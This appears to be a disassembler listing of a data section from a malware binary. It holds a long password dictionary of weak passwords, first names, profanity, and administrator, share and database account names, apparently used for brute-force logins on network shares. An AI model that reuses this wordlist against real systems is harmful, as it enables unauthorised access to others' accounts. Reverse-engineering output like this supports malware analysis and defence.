align 4
aCodename db 'codename',0 ; DATA XREF: ___:0042F57C�o
align 4
aCode db 'code',0 ; DATA XREF: ___:0042F578�o
align 4
aCock db 'cock',0 ; DATA XREF: ___:0042F574�o
align 4
aCocainco db 'cocainco',0 ; DATA XREF: ___:0042F570�o
align 10h
aCocacola db 'cocacola',0 ; DATA XREF: ___:0042F56C�o
align 4
aCoast db 'coast',0 ; DATA XREF: ___:0042F568�o
align 4
aClusters db 'clusters',0 ; DATA XREF: ___:0042F564�o
align 10h
aCluster db 'cluster',0 ; DATA XREF: ___:0042F560�o
aClinton db 'clinton',0 ; DATA XREF: ___:0042F55C�o
aCleavage db 'cleavage',0 ; DATA XREF: ___:0042F558�o
align 4
aClaymore db 'claymore',0 ; DATA XREF: ___:0042F554�o
align 4
aClaudia db 'claudia',0 ; DATA XREF: ___:0042F550�o
aClassic db 'classic',0 ; DATA XREF: ___:0042F54C�o
aClasses db 'classes',0 ; DATA XREF: ___:0042F548�o
aClass db 'class',0 ; DATA XREF: ___:0042F544�o
align 4
aCindy db 'cindy',0 ; DATA XREF: ___:0042F540�o
align 10h
aCigarett db 'cigarett',0 ; DATA XREF: ___:0042F53C�o
align 4
aCigar db 'cigar',0 ; DATA XREF: ___:0042F538�o
align 4
aChristy db 'christy',0 ; DATA XREF: ___:0042F534�o
aChristin db 'christin',0 ; DATA XREF: ___:0042F530�o
align 4
aChris db 'chris',0 ; DATA XREF: ___:0042F52C�o
align 10h
aChip db 'chip',0 ; DATA XREF: ___:0042F528�o
align 4
aChester db 'chester',0 ; DATA XREF: ___:0042F524�o
aChess db 'chess',0 ; DATA XREF: ___:0042F520�o
align 4
aChemistr db 'chemistr',0 ; DATA XREF: ___:0042F51C�o
align 4
aChem db 'chem',0 ; DATA XREF: ___:0042F518�o
align 4
aChat_0 db 'chat',0 ; DATA XREF: ___:0042F514�o
align 4
aCharon db 'charon',0 ; DATA XREF: ___:0042F510�o
align 4
aCharming db 'charming',0 ; DATA XREF: ___:0042F50C�o
align 4
aCharlie db 'charlie',0 ; DATA XREF: ___:0042F508�o
aCharles db 'charles',0 ; DATA XREF: ___:0042F504�o
aCharity db 'charity',0 ; DATA XREF: ___:0042F500�o
aChange db 'change',0 ; DATA XREF: ___:0042F4FC�o
align 4
aCerulean db 'cerulean',0 ; DATA XREF: ___:0042F4F8�o
align 4
aCeltics db 'celtics',0 ; DATA XREF: ___:0042F4F4�o
aCeltic db 'celtic',0 ; DATA XREF: ___:0042F4F0�o
align 4
aCelt db 'celt',0 ; DATA XREF: ___:0042F4EC�o
align 4
aCecily db 'cecily',0 ; DATA XREF: ___:0042F4E8�o
align 4
aCayuga db 'cayuga',0 ; DATA XREF: ___:0042F4E4�o
align 4
aCave db 'cave',0 ; DATA XREF: ___:0042F4E0�o
align 4
aCathy db 'cathy',0 ; DATA XREF: ___:0042F4DC�o
align 4
aCatholic db 'catholic',0 ; DATA XREF: ___:0042F4D8�o
align 4
aCatherin db 'catherin',0 ; DATA XREF: ___:0042F4D4�o
align 4
aCastle db 'castle',0 ; DATA XREF: ___:0042F4D0�o
align 4
aCash db 'cash',0 ; DATA XREF: ___:0042F4CC�o
align 4
aCascades db 'cascades',0 ; DATA XREF: ___:0042F4C8�o
align 10h
aCarson db 'carson',0 ; DATA XREF: ___:0042F4C4�o
align 4
aCarrie db 'carrie',0 ; DATA XREF: ___:0042F4C0�o
align 10h
aCaroline db 'caroline',0 ; DATA XREF: ___:0042F4BC�o
align 4
aCarolina db 'carolina',0 ; DATA XREF: ___:0042F4B8�o
align 4
aCarole db 'carole',0 ; DATA XREF: ___:0042F4B4�o
align 10h
aCarol db 'carol',0 ; DATA XREF: ___:0042F4B0�o
align 4
aCarmen db 'carmen',0 ; DATA XREF: ___:0042F4AC�o
align 10h
aCarla db 'carla',0 ; DATA XREF: ___:0042F4A8�o
align 4
aCaren db 'caren',0 ; DATA XREF: ___:0042F4A4�o
align 10h
aCardinal db 'cardinal',0 ; DATA XREF: ___:0042F4A0�o
align 4
aCard db 'card',0 ; DATA XREF: ___:0042F49C�o
align 4
aCapture db 'capture',0 ; DATA XREF: ___:0042F498�o
aCaptain db 'captain',0 ; DATA XREF: ___:0042F494�o
aCantor db 'cantor',0 ; DATA XREF: ___:0042F490�o
align 4
aCandy db 'candy',0 ; DATA XREF: ___:0042F48C�o
align 4
aCandi db 'candi',0 ; DATA XREF: ___:0042F488�o
align 4
aCamping db 'camping',0 ; DATA XREF: ___:0042F484�o
aCampanil db 'campanil',0 ; DATA XREF: ___:0042F480�o
align 10h
aCamille db 'camille',0 ; DATA XREF: ___:0042F47C�o
aCaliforn db 'californ',0 ; DATA XREF: ___:0042F478�o
align 4
aButthead db 'butthead',0 ; DATA XREF: ___:0042F474�o
align 10h
aButt db 'butt',0 ; DATA XREF: ___:0042F470�o
align 4
aButch db 'butch',0 ; DATA XREF: ___:0042F46C�o
align 10h
aBurn db 'burn',0 ; DATA XREF: ___:0042F468�o
align 4
aBurgess db 'burgess',0 ; DATA XREF: ___:0042F464�o
aBung db 'bung',0 ; DATA XREF: ___:0042F460�o
align 4
aBumbling db 'bumbling',0 ; DATA XREF: ___:0042F45C�o
align 4
aBullshit db 'bullshit',0 ; DATA XREF: ___:0042F458�o
align 10h
aBulls db 'bulls',0 ; DATA XREF: ___:0042F454�o
align 4
aBrutefor db 'brutefor',0 ; DATA XREF: ___:0042F450�o
align 4
aBrute db 'brute',0 ; DATA XREF: ___:0042F44C�o
align 4
aBrunette db 'brunette',0 ; DATA XREF: ___:0042F448�o
align 4
aBrothel db 'brothel',0 ; DATA XREF: ___:0042F444�o
aBroadway db 'broadway',0 ; DATA XREF: ___:0042F440�o
align 4
aBridget db 'bridget',0 ; DATA XREF: ___:0042F43C�o
aBrian db 'brian',0 ; DATA XREF: ___:0042F438�o
align 4
aBrenda db 'brenda',0 ; DATA XREF: ___:0042F434�o
align 4
aBreast db 'breast',0 ; DATA XREF: ___:0042F430�o
align 4
aBreak db 'break',0 ; DATA XREF: ___:0042F42C�o
align 4
aBravo db 'bravo',0 ; DATA XREF: ___:0042F428�o
align 4
aBrandy db 'brandy',0 ; DATA XREF: ___:0042F424�o
align 4
aBrandi db 'brandi',0 ; DATA XREF: ___:0042F420�o
align 4
aBradley db 'bradley',0 ; DATA XREF: ___:0042F41C�o
aBoyscout db 'boyscout',0 ; DATA XREF: ___:0042F418�o
align 10h
aBorn db 'born',0 ; DATA XREF: ___:0042F414�o
align 4
aBook db 'book',0 ; DATA XREF: ___:0042F410�o
align 10h
aBoobs db 'boobs',0 ; DATA XREF: ___:0042F40C�o
align 4
aBoob db 'boob',0 ; DATA XREF: ___:0042F408�o
align 10h
aBoner db 'boner',0 ; DATA XREF: ___:0042F404�o
align 4
aBomb db 'bomb',0 ; DATA XREF: ___:0042F400�o
align 10h
aBoard db 'board',0 ; DATA XREF: ___:0042F3FC�o
align 4
aBlues db 'blues',0 ; DATA XREF: ___:0042F3F8�o
align 10h
aBlue db 'blue',0 ; DATA XREF: ___:0042F3F4�o
align 4
aBlowjob db 'blowjob',0 ; DATA XREF: ___:0042F3F0�o
aBlow db 'blow',0 ; DATA XREF: ___:0042F3EC�o
align 4
aBloodaxe db 'bloodaxe',0 ; DATA XREF: ___:0042F3E8�o
align 4
aBlood db 'blood',0 ; DATA XREF: ___:0042F3E4�o
align 4
aBlondie db 'blondie',0 ; DATA XREF: ___:0042F3E0�o
aBlonde db 'blonde',0 ; DATA XREF: ___:0042F3DC�o
align 4
aBlack db 'black',0 ; DATA XREF: ___:0042F3D8�o
align 4
aBitnet db 'bitnet',0 ; DATA XREF: ___:0042F3D4�o
align 4
aBitmap db 'bitmap',0 ; DATA XREF: ___:0042F3D0�o
align 4
aBitch db 'bitch',0 ; DATA XREF: ___:0042F3CC�o
align 4
aBishop db 'bishop',0 ; DATA XREF: ___:0042F3C8�o
align 4
aBird db 'bird',0 ; DATA XREF: ___:0042F3C4�o
align 4
aBios db 'bios',0 ; DATA XREF: ___:0042F3C0�o
align 4
aBinary db 'binary',0 ; DATA XREF: ___:0042F3BC�o
align 4
aBill db 'bill',0 ; DATA XREF: ___:0042F3B8�o
align 4
aBigfoot db 'bigfoot',0 ; DATA XREF: ___:0042F3B4�o
aBicamera db 'bicamera',0 ; DATA XREF: ___:0042F3B0�o
align 4
aBible db 'bible',0 ; DATA XREF: ___:0042F3AC�o
align 10h
aBeverly db 'beverly',0 ; DATA XREF: ___:0042F3A8�o
aBetty db 'betty',0 ; DATA XREF: ___:0042F3A4�o
align 10h
aBetsie db 'betsie',0 ; DATA XREF: ___:0042F3A0�o
align 4
aBeth db 'beth',0 ; DATA XREF: ___:0042F39C�o
align 10h
aBeta db 'beta',0 ; DATA XREF: ___:0042F398�o
align 4
aBeryl db 'beryl',0 ; DATA XREF: ___:0042F394�o
align 10h
aBerliner db 'berliner',0 ; DATA XREF: ___:0042F390�o
align 4
aBerlin db 'berlin',0 ; DATA XREF: ___:0042F38C�o
align 4
aBerkeley db 'berkeley',0 ; DATA XREF: ___:0042F388�o
align 10h
aBeowulf db 'beowulf',0 ; DATA XREF: ___:0042F384�o
aBenz db 'benz',0 ; DATA XREF: ___:0042F380�o
align 10h
aBeloved db 'beloved',0 ; DATA XREF: ___:0042F37C�o
aBell db 'bell',0 ; DATA XREF: ___:0042F378�o
align 10h
aBehead db 'behead',0 ; DATA XREF: ___:0042F374�o
align 4
aBegin db 'begin',0 ; DATA XREF: ___:0042F370�o
align 10h
aBeethove db 'beethove',0 ; DATA XREF: ___:0042F36C�o
align 4
aBecky db 'becky',0 ; DATA XREF: ___:0042F368�o
align 4
aBeaver db 'beaver',0 ; DATA XREF: ___:0042F364�o
align 4
aBeauty db 'beauty',0 ; DATA XREF: ___:0042F360�o
align 4
aBeater db 'beater',0 ; DATA XREF: ___:0042F35C�o
align 4
aBeast db 'beast',0 ; DATA XREF: ___:0042F358�o
align 4
aBear db 'bear',0 ; DATA XREF: ___:0042F354�o
align 4
aBeammeup db 'beammeup',0 ; DATA XREF: ___:0042F350�o
align 4
aBeach db 'beach',0 ; DATA XREF: ___:0042F34C�o
align 10h
aBatman db 'batman',0 ; DATA XREF: ___:0042F348�o
align 4
aBatch db 'batch',0 ; DATA XREF: ___:0042F344�o
align 10h
aBassoon db 'bassoon',0 ; DATA XREF: ___:0042F340�o
aBass db 'bass',0 ; DATA XREF: ___:0042F33C�o
align 10h
aBasic db 'basic',0 ; DATA XREF: ___:0042F338�o
align 4
aBaseball db 'baseball',0 ; DATA XREF: ___:0042F334�o
align 4
aBartman db 'bartman',0 ; DATA XREF: ___:0042F330�o
aBart db 'bart',0 ; DATA XREF: ___:0042F32C�o
align 4
aBaritone db 'baritone',0 ; DATA XREF: ___:0042F328�o
align 10h
aBarf db 'barf',0 ; DATA XREF: ___:0042F324�o
align 4
aBare db 'bare',0 ; DATA XREF: ___:0042F320�o
align 10h
aBarber db 'barber',0 ; DATA XREF: ___:0042F31C�o
align 4
aBarbara db 'barbara',0 ; DATA XREF: ___:0042F318�o
aBanks db 'banks',0 ; DATA XREF: ___:0042F314�o
align 4
aBank db 'bank',0 ; DATA XREF: ___:0042F310�o
align 10h
aBandit db 'bandit',0 ; DATA XREF: ___:0042F30C�o
align 4
aBananas db 'bananas',0 ; DATA XREF: ___:0042F308�o
aBanana db 'banana',0 ; DATA XREF: ___:0042F304�o
align 4
aBall db 'ball',0 ; DATA XREF: ___:0042F300�o
align 10h
aBailey db 'bailey',0 ; DATA XREF: ___:0042F2FC�o
align 4
aBadass db 'badass',0 ; DATA XREF: ___:0042F2F8�o
align 10h
aBackdoor db 'backdoor',0 ; DATA XREF: ___:0042F2F4�o
align 4
aBacchus db 'bacchus',0 ; DATA XREF: ___:0042F2F0�o
aBaby db 'baby',0 ; DATA XREF: ___:0042F2EC�o
align 4
aBabe db 'babe',0 ; DATA XREF: ___:0042F2E8�o
align 4
aAzure db 'azure',0 ; DATA XREF: ___:0042F2E4�o
align 4
aAztecs db 'aztecs',0 ; DATA XREF: ___:0042F2E0�o
align 4
aAuthoriz db 'authoriz',0 ; DATA XREF: ___:0042F2DC�o
align 10h
aAttack db 'attack',0 ; DATA XREF: ___:0042F2D8�o
align 4
aAtom db 'atom',0 ; DATA XREF: ___:0042F2D4�o
align 10h
aAtmosphe db 'atmosphe',0 ; DATA XREF: ___:0042F2D0�o
align 4
aAthena db 'athena',0 ; DATA XREF: ___:0042F2CC�o
align 4
aAsshole db 'asshole',0 ; DATA XREF: ___:0042F2C8�o
aAsian db 'asian',0 ; DATA XREF: ___:0042F2C4�o
align 4
aArtist db 'artist',0 ; DATA XREF: ___:0042F2C0�o
align 4
aArthur db 'arthur',0 ; DATA XREF: ___:0042F2BC�o
align 4
aArrow db 'arrow',0 ; DATA XREF: ___:0042F2B8�o
align 4
aArmy db 'army',0 ; DATA XREF: ___:0042F2B4�o
align 4
aArlene db 'arlene',0 ; DATA XREF: ___:0042F2B0�o
align 4
aAriadne db 'ariadne',0 ; DATA XREF: ___:0042F2AC�o
aAria db 'aria',0 ; DATA XREF: ___:0042F2A8�o
align 4
aApril db 'april',0 ; DATA XREF: ___:0042F2A4�o
align 4
aApollo13 db 'apollo13',0 ; DATA XREF: ___:0042F2A0�o
align 10h
aAnything db 'anything',0 ; DATA XREF: ___:0042F29C�o
align 4
aAnvils db 'anvils',0 ; DATA XREF: ___:0042F298�o
align 4
aAnthropo db 'anthropo',0 ; DATA XREF: ___:0042F294�o
align 10h
aAnthrax db 'anthrax',0 ; DATA XREF: ___:0042F290�o
aAnswer db 'answer',0 ; DATA XREF: ___:0042F28C�o
align 10h
aAnonymou db 'anonymou',0 ; DATA XREF: ___:0042F288�o
align 4
aAnon db 'anon',0 ; DATA XREF: ___:0042F284�o
align 4
aAnnette db 'annette',0 ; DATA XREF: ___:0042F280�o
aAnne db 'anne',0 ; DATA XREF: ___:0042F27C�o
align 4
aAnna db 'anna',0 ; DATA XREF: ___:0042F278�o
align 4
aAnita db 'anita',0 ; DATA XREF: ___:0042F274�o
align 4
aAnimals db 'animals',0 ; DATA XREF: ___:0042F270�o
aAnimal db 'animal',0 ; DATA XREF: ___:0042F26C�o
align 4
aAngie db 'angie',0 ; DATA XREF: ___:0042F268�o
align 4
aAngerine db 'angerine',0 ; DATA XREF: ___:0042F264�o
align 4
aAngela db 'angela',0 ; DATA XREF: ___:0042F260�o
align 10h
aAnfo db 'anfo',0 ; DATA XREF: ___:0042F25C�o
align 4
aAndy db 'andy',0 ; DATA XREF: ___:0042F258�o
align 10h
aAndromac db 'andromac',0 ; DATA XREF: ___:0042F254�o
align 4
aAndroid db 'android',0 ; DATA XREF: ___:0042F250�o
aAndrea db 'andrea',0 ; DATA XREF: ___:0042F24C�o
align 4
aAnchor db 'anchor',0 ; DATA XREF: ___:0042F248�o
align 4
aAnarchy db 'anarchy',0 ; DATA XREF: ___:0042F244�o
aAnarchis db 'anarchis',0 ; DATA XREF: ___:0042F240�o
align 4
aAnalog db 'analog',0 ; DATA XREF: ___:0042F23C�o
align 10h
aAnal db 'anal',0 ; DATA XREF: ___:0042F238�o
align 4
aAmorphou db 'amorphou',0 ; DATA XREF: ___:0042F234�o
align 4
aAmerica db 'america',0 ; DATA XREF: ___:0042F230�o
aAmber db 'amber',0 ; DATA XREF: ___:0042F22C�o
align 4
aAmanda db 'amanda',0 ; DATA XREF: ___:0042F228�o
align 4
aAmadeus db 'amadeus',0 ; DATA XREF: ___:0042F224�o
aAlphabet db 'alphabet',0 ; DATA XREF: ___:0042F220�o
align 10h
aAllow db 'allow',0 ; DATA XREF: ___:0042F21C�o
align 4
aAllison db 'allison',0 ; DATA XREF: ___:0042F218�o
aAlison db 'alison',0 ; DATA XREF: ___:0042F214�o
align 4
aAlisa db 'alisa',0 ; DATA XREF: ___:0042F210�o
align 10h
aAlicia db 'alicia',0 ; DATA XREF: ___:0042F20C�o
align 4
aAlice db 'alice',0 ; DATA XREF: ___:0042F208�o
align 10h
aAliases db 'aliases',0 ; DATA XREF: ___:0042F204�o
aAlias db 'alias',0 ; DATA XREF: ___:0042F200�o
align 10h
aAlgebra db 'algebra',0 ; DATA XREF: ___:0042F1FC�o
aAlexande db 'alexande',0 ; DATA XREF: ___:0042F1F8�o
align 4
aAlex db 'alex',0 ; DATA XREF: ___:0042F1F4�o
align 4
aAlert db 'alert',0 ; DATA XREF: ___:0042F1F0�o
align 4
aAlbert db 'albert',0 ; DATA XREF: ___:0042F1EC�o
align 4
aAlbatros db 'albatros',0 ; DATA XREF: ___:0042F1E8�o
align 4
aAlbany db 'albany',0 ; DATA XREF: ___:0042F1E4�o
align 10h
aAlaska db 'alaska',0 ; DATA XREF: ___:0042F1E0�o
align 4
aAirplane db 'airplane',0 ; DATA XREF: ___:0042F1DC�o
align 4
aAids db 'aids',0 ; DATA XREF: ___:0042F1D8�o
align 4
aAerobics db 'aerobics',0 ; DATA XREF: ___:0042F1D4�o
align 4
aAdult db 'adult',0 ; DATA XREF: ___:0042F1D0�o
align 10h
aAdrianna db 'adrianna',0 ; DATA XREF: ___:0042F1CC�o
align 4
aAdrian db 'adrian',0 ; DATA XREF: ___:0042F1C8�o
align 4
aAdam db 'adam',0 ; DATA XREF: ___:0042F1C4�o
align 4
aAction db 'action',0 ; DATA XREF: ___:0042F1C0�o
align 4
aAccount db 'account',0 ; DATA XREF: ___:0042F1BC�o
aAcademic db 'academic',0 ; DATA XREF: ___:0042F1B4�o
align 4
aAcademia db 'academia',0 ; DATA XREF: ___:0042F1B0�o
align 4
a000000 db '000000',0 ; DATA XREF: ___:0042F1AC�o
align 4
a00000 db '00000',0 ; DATA XREF: ___:0042F1A8�o
align 4
a0000 db '0000',0 ; DATA XREF: ___:0042F1A4�o
align 4
a000 db '000',0 ; DATA XREF: ___:0042F1A0�o
aTesting db 'testing',0 ; DATA XREF: ___:0042F19C�o
aDeath db 'death',0 ; DATA XREF: ___:0042F198�o
align 10h
a00 db '00',0 ; DATA XREF: ___:0042F194�o
align 4
a0: ; DATA XREF: ___:0042F190�o
unicode 0, <0>,0
aXxxxxxxxx db 'xxxxxxxxx',0 ; DATA XREF: ___:0042F18C�o
align 4
aXxxxxxxx db 'xxxxxxxx',0 ; DATA XREF: ___:0042F188�o
align 10h
aXxxxxxx db 'xxxxxxx',0 ; DATA XREF: ___:0042F184�o
aXxxxxx db 'xxxxxx',0 ; DATA XREF: ___:0042F180�o
align 10h
aXxxxx db 'xxxxx',0 ; DATA XREF: ___:0042F17C�o
align 4
aXxxx db 'xxxx',0 ; DATA XREF: ___:0042F178�o
align 10h
aXxx db 'xxx',0 ; DATA XREF: ___:0042F174�o
aXx db 'xx',0 ; DATA XREF: ___:0042F170�o
align 4
asc_4343A8: ; DATA XREF: ___:0042F16C�o
unicode 0, <x>,0
aGuessme db 'guessme',0 ; DATA XREF: ___:0042F168�o
aYouwontguessme db 'youwontguessme',0 ; DATA XREF: ___:0042F164�o
align 4
aUwontguessme db 'uwontguessme',0 ; DATA XREF: ___:0042F160�o
align 4
aMirc_0 db 'mirc',0 ; DATA XREF: ___:0042F15C�o
align 4
aKiddie db 'kiddie',0 ; DATA XREF: ___:0042F158�o
align 4
aScriptkiddie db 'scriptkiddie',0 ; DATA XREF: ___:0042F154�o
align 4
aScript db 'script',0 ; DATA XREF: ___:0042F150�o
align 4
aHax0r db 'hax0r',0 ; DATA XREF: ___:0042F14C�o
align 4
aHacker db 'hacker',0 ; DATA XREF: ___:0042F148�o
align 4
aL337 db 'l337',0 ; DATA XREF: ___:0042F144�o
align 4
aL33t db 'l33t',0 ; DATA XREF: ___:0042F140�o
align 4
aLeet db 'leet',0 ; DATA XREF: ___:0042F13C�o
align 4
aKiller db 'killer',0 ; DATA XREF: ___:0042F138�o
align 4
a0wn3d db '0wn3d',0 ; DATA XREF: ___:0042F134�o
align 4
aW00t db 'w00t',0 ; DATA XREF: ___:0042F130�o
align 4
aHeaven db 'heaven',0 ; DATA XREF: ___:0042F12C�o
align 4
aSpaceman db 'spaceman',0 ; DATA XREF: ___:0042F128�o
align 10h
aSatanic db 'satanic',0 ; DATA XREF: ___:0042F124�o
aSatanik db 'satanik',0 ; DATA XREF: ___:0042F120�o
aSatan db 'satan',0 ; DATA XREF: ___:0042F11C�o
align 4
aGobo db 'gobo',0 ; DATA XREF: ___:0042F118�o
align 10h
aMatthew db 'Matthew',0 ; DATA XREF: ___:0042F114�o
aMatt db 'Matt',0 ; DATA XREF: ___:0042F110�o
align 10h
aMat db 'Mat',0 ; DATA XREF: ___:0042F10C�o
aPw db 'pw',0 ; DATA XREF: ___:0042F108�o
align 4
aMypass123 db 'mypass123',0 ; DATA XREF: ___:0042F104�o
align 4
aMypass db 'mypass',0 ; DATA XREF: ___:0042F100�o
align 4
aPw123 db 'pw123',0 ; DATA XREF: ___:0042F0FC�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: ___:0042F0F8�o
align 10h
aMypc123 db 'mypc123',0 ; DATA XREF: ___:0042F0F4�o
aMypc db 'mypc',0 ; DATA XREF: ___:0042F0F0�o
align 10h
aLove db 'love',0 ; DATA XREF: ___:0042F0EC�o
align 4
aPwd db 'pwd',0 ; DATA XREF: ___:0042F0E8�o
aLogin_1 db 'login',0 ; DATA XREF: ___:0042F0E4�o
align 4
aHome db 'home',0 ; DATA XREF: ___:0042F0E0�o
align 4
aZxcv db 'zxcv',0 ; DATA XREF: ___:0042F0DC�o
align 4
aYxcv db 'yxcv',0 ; DATA XREF: ___:0042F0D8�o
align 4
aQwer db 'qwer',0 ; DATA XREF: ___:0042F0D4�o
align 4
aSecret db 'secret',0 ; DATA XREF: ___:0042F0D0�o
align 4
aAsdf db 'asdf',0 ; DATA XREF: ___:0042F0CC�o
align 4
aPc db 'pc',0 ; DATA XREF: ___:0042F0C8�o
align 4
aWin db 'win',0 ; DATA XREF: ___:0042F0C4�o
aTest123 db 'test123',0 ; DATA XREF: ___:0042F0C0�o
aAbc db 'abc',0 ; DATA XREF: ___:0042F0BC�o
aAaa db 'aaa',0 ; DATA XREF: ___:0042F0B8�o
aA_0: ; DATA XREF: ___:0042F0B4�o
unicode 0, <a>,0
aCrash db 'crash',0 ; DATA XREF: ___:0042F0B0�o
align 4
aFucked db 'fucked',0 ; DATA XREF: ___:0042F0AC�o
align 10h
aNetfuck db 'netfuck',0 ; DATA XREF: ___:0042F0A8�o
aIrule db 'irule',0 ; DATA XREF: ___:0042F0A4�o
align 10h
aOwned db 'owned',0 ; DATA XREF: ___:0042F0A0�o
align 4
a0wned db '0wned',0 ; DATA XREF: ___:0042F09C�o
align 10h
aNetDevil db 'net-devil',0 ; DATA XREF: ___:0042F098�o
align 4
aNetdevil db 'netdevil',0 ; DATA XREF: ___:0042F094�o
align 4
aDevil db 'devil',0 ; DATA XREF: ___:0042F090�o
align 10h
aNilez db 'Nilez',0 ; DATA XREF: ___:0042F08C�o
align 4
aFoobar db 'foobar',0 ; DATA XREF: ___:0042F088�o
align 10h
aGod db 'god',0 ; DATA XREF: ___:0042F084�o
aSex db 'sex',0 ; DATA XREF: ___:0042F080�o
aPat db 'pat',0 ; DATA XREF: ___:0042F07C�o
aPatrick db 'patrick',0 ; DATA XREF: ___:0042F078�o
aAlpha db 'alpha',0 ; DATA XREF: ___:0042F074�o
align 4
a007 db '007',0 ; DATA XREF: ___:0042F070�o
a123abc db '123abc',0 ; DATA XREF: ___:0042F06C�o
align 4
a1234qwer db '1234qwer',0 ; DATA XREF: ___:0042F068�o
align 4
a123123 db '123123',0 ; DATA XREF: ___:0042F064�o
align 4
a121212 db '121212',0 ; DATA XREF: ___:0042F060�o
align 4
a111111 db '111111',0 ; DATA XREF: ___:0042F05C�o
align 4
a110 db '110',0 ; DATA XREF: ___:0042F058�o
a2600 db '2600',0 ; DATA XREF: ___:0042F054�o
align 4
a2002 db '2002',0 ; DATA XREF: ___:0042F04C�o
align 10h
aXp_0 db 'xp',0 ; DATA XREF: ___:0042F048�o
align 4
aEnable db 'enable',0 ; DATA XREF: ___:0042F044�o
align 4
aGodblessyou db 'godblessyou',0 ; DATA XREF: ___:0042F040�o
aIhavenopass db 'ihavenopass',0 ; DATA XREF: ___:0042F03C�o
a123asd db '123asd',0 ; DATA XREF: ___:0042F038�o
align 4
aSuper db 'super',0 ; DATA XREF: ___:0042F034�o
align 4
aInternet db 'Internet',0 ; DATA XREF: ___:0042F030�o
align 10h
a123qwe db '123qwe',0 ; DATA XREF: ___:0042F028�o
align 4
aSybase db 'sybase',0 ; DATA XREF: ___:0042F024�o
align 10h
aAbc123 db 'abc123',0 ; DATA XREF: ___:0042F01C�o
align 4
aAbcd db 'abcd',0 ; DATA XREF: ___:0042F018�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: ___:0042F010�o
align 4
aPass_1 db 'pass',0 ; DATA XREF: ___:0042F00C�o
align 10h
a88888888 db '88888888',0 ; DATA XREF: ___:0042F008�o
align 4
a11111111 db '11111111',0 ; DATA XREF: ___:0042F004�o
align 4
a111 db '111',0 ; DATA XREF: ___:0042F000�o
a54321 db '54321',0 ; DATA XREF: ___:0042EFFC�o
align 4
a654321 db '654321',0 ; DATA XREF: ___:0042EFF8�o
align 4
a123456789 db '123456789',0 ; DATA XREF: ___:0042EFF4�o
align 4
a12345678 db '12345678',0 ; DATA XREF: ___:0042EFF0�o
align 4
a1234567 db '1234567',0 ; DATA XREF: ___:0042EFEC�o
a123456 db '123456',0 ; DATA XREF: ___:0042EFE8�o
align 4
a12345 db '12345',0 ; DATA XREF: ___:0042EFE4�o
align 4
a1234 db '1234',0 ; DATA XREF: ___:0042EFE0�o
align 4
a123 db '123',0 ; DATA XREF: ___:0042EFDC�o
a12 db '12',0 ; DATA XREF: ___:0042EFD8�o
align 4
a1: ; DATA XREF: ___:004160AC�o
; ___:0042EFD4�o
unicode 0, <1>,0
aTemp123 db 'temp123',0 ; DATA XREF: ___:0042EFD0�o
aChangeme_0 db 'Changeme',0 ; DATA XREF: ___:0042EFCC�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: ___:0042EFC8�o
align 10h
aLinux db 'linux',0 ; DATA XREF: ___:0042EFC4�o
align 4
aUnix db 'unix',0 ; DATA XREF: ___:0042EFC0�o
align 10h
aLocal db 'LOCAL',0 ; DATA XREF: ___:0042EFBC�o
align 4
aPepsi db 'pepsi',0 ; DATA XREF: ___:0042EFB8�o
align 10h
aServer_0 db 'SERVER',0 ; DATA XREF: ___:0042EFB4�o
align 4
aSystem db 'SYSTEM',0 ; DATA XREF: ___:0042EFB0�o
align 10h
aBackup db 'BACKUP',0 ; DATA XREF: ___:0042EFAC�o
align 4
aAccess db 'ACCESS',0 ; DATA XREF: ___:0042EFA4�o
align 10h
aTest db 'TEST',0 ; DATA XREF: ___:0042EFA0�o
align 4
aEdu db 'edu',0 ; DATA XREF: ___:0042EF9C�o
aOwner_1 db 'Owner',0 ; DATA XREF: ___:0042EF98�o
align 4
aOwner_0 db 'OWNER',0 ; DATA XREF: ___:0042EF94�o
align 4
aDemo db 'DEMO',0 ; DATA XREF: ___:0042EF90�o
align 4
aFiles db 'FILES',0 ; DATA XREF: ___:0042EF8C�o
align 4
aRead db 'READ',0 ; DATA XREF: ___:0042EF88�o
align 4
aBoth db 'BOTH',0 ; DATA XREF: ___:0042EF84�o
align 4
aLadeda db 'ladeda',0 ; DATA XREF: ___:0042EF80�o
align 4
aFull_0 db 'FULL',0 ; DATA XREF: ___:0042EF7C�o
align 4
aWrite db 'WRITE',0 ; DATA XREF: ___:0042EF78�o
align 4
aShare_0 db 'SHARE',0 ; DATA XREF: ___:0042EF74�o
align 4
aTemp db 'TEMP',0 ; DATA XREF: ___:0042EF70�o
align 4
aPassword db 'PASSWORD',0 ; DATA XREF: ___:0042EF6C�o
align 10h
aAdmin_0 db 'ADMIN',0 ; DATA XREF: ___:0042EF68�o
align 4
aRoot_0 db 'ROOT',0 ; DATA XREF: ___:0042EF60�o
align 10h
aGuest_1 db 'GUEST',0 ; DATA XREF: ___:0042EF5C�o
align 4
aBla db 'bla',0 ; DATA XREF: ___:0042EF58�o
aFubar db 'fubar',0 ; DATA XREF: ___:0042EF54�o
align 4
aAdministrato_1 db 'ADMINISTRATOR',0 ; DATA XREF: ___:0042EF48�o
align 4
aDb2 db 'db2',0 ; DATA XREF: ___:0042EF38�o
aOracle db 'oracle',0 ; DATA XREF: ___:0042EF34�o
; ___:0042F020�o
align 10h
aDba db 'dba',0 ; DATA XREF: ___:0042EF30�o
aDatabase db 'database',0 ; DATA XREF: ___:0042EF2C�o
; ___:0042F014�o
align 10h
aDefault db 'default',0 ; DATA XREF: ___:0042EF28�o
; ___:0042F6B4�o
aGuest_0 db 'guest',0 ; DATA XREF: ___:0042EF24�o
align 10h
aWwwadmin db 'wwwadmin',0 ; DATA XREF: ___:0042EF20�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: ___:0042EF1C�o
; ___:00430648�o
aStudent db 'student',0 ; DATA XREF: ___:0042EF18�o
; ___:00430590�o
aOwner db 'owner',0 ; DATA XREF: ___:0042EF14�o
align 4
aComputer db 'computer',0 ; DATA XREF: ___:0042EF10�o
; ___:0042F02C�o
align 10h
aStaff db 'staff',0 ; DATA XREF: ___:0042EF08�o
align 4
aAdmins db 'admins',0 ; DATA XREF: ___:0042EF00�o
align 10h
aAdministrat db 'administrat',0 ; DATA XREF: ___:0042EEFC�o
aAdministrateur db 'administrateur',0 ; DATA XREF: ___:0042EEF8�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: ___:0042EEF4�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: ___:0042EEF0�o
; ___:0042EF50�o
align 4
